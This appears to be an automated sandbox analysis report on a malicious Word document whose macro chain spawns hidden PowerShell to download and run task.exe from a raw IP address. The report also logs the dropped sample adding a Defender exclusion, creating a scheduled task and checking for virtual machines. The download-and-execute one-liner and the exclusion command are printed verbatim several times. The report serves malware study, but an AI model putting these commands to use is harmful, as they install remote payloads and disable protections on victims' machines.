                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                    Source: C:\Users\user\AppData\Roaming\task.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                    Source: C:\Users\user\AppData\Roaming\task.exe Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
                    Source: C:\Users\user\AppData\Roaming\task.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD068.tmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\task.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\task.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Users\user\AppData\Roaming\task.exe Mutant created: \Sessions\1\BaseNamedObjects\hFVAGeNDDuOIYKYzrWNabcGxrk
                    Source: C:\Users\user\AppData\Roaming\task.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: task.exe String found in binary or memory: /DriveIn;component/views/addbook.xaml
                    Source: task.exe String found in binary or memory: views/addcustomer.baml
                    Source: task.exe String found in binary or memory: views/addbook.baml
                    Source: task.exe String found in binary or memory: /DriveIn;component/views/addcustomer.xaml
                    Source: task.exe String found in binary or memory: /DriveIn;component/views/addbook.xaml
                    Source: task.exe String found in binary or memory: views/addcustomer.baml
                    Source: task.exe String found in binary or memory: views/addbook.baml
                    Source: task.exe String found in binary or memory: /DriveIn;component/views/addcustomer.xaml
                    Source: 14.0.task.exe.400000.11.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.task.exe.400000.11.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Roaming\task.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\task.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\task.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: :\Windows\dll\mscorlib.pdb0 source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb, source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker
Source: task[1].exe.0.dr, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: task.exe.3.dr, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: SzfukVRF.exe.9.dr, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.task.exe.cf0000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.task.exe.cf0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.12.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.3.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.6.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00CF9347 push ds; ret
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00CF9361 push ds; retf
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 9_2_00CF92F5 push ds; ret
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00CF9347 push ds; ret
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00CF9361 push ds; retf
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00CF92F5 push ds; ret
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 14_2_00BE21C8 push esp; retn 0039h
Source: initial sample | Static PE information: section name: .text entropy: 7.88557099769

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Users\user\AppData\Roaming\task.exe | File created: C:\Users\user\AppData\Roaming\SzfukVRF.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\task.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\task.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\task.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Yara detected AntiVM3
                    Source: Yara match File source: 9.2.task.exe.22ff1b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 152 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2528 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2204 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964 Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964 Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044 Thread sleep count: 6172 > 30
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044 Thread sleep count: 620 > 30
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964 Thread sleep count: 35 > 30
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 1684 Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 284 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2300 Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2128 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\task.exe TID: 2128 Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exe Thread delayed: delay time: 240000
                    Source: C:\Users\user\AppData\Roaming\task.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exe Window / User API: threadDelayed 6172
                    Source: C:\Users\user\AppData\Roaming\task.exe Window / User API: threadDelayed 620
                    Source: C:\Users\user\AppData\Roaming\task.exe Window / User API: threadDelayed 9581
                    Source: C:\Users\user\AppData\Roaming\task.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 240000
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\task.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: task.exe, 00000009.00000002.447908400.00000000008EA000.00000004.00000001.sdmpBinary or memory string: VMware_S
                    Source: task.exe, 00000009.00000003.446953826.0000000005531000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess token adjusted: Debug
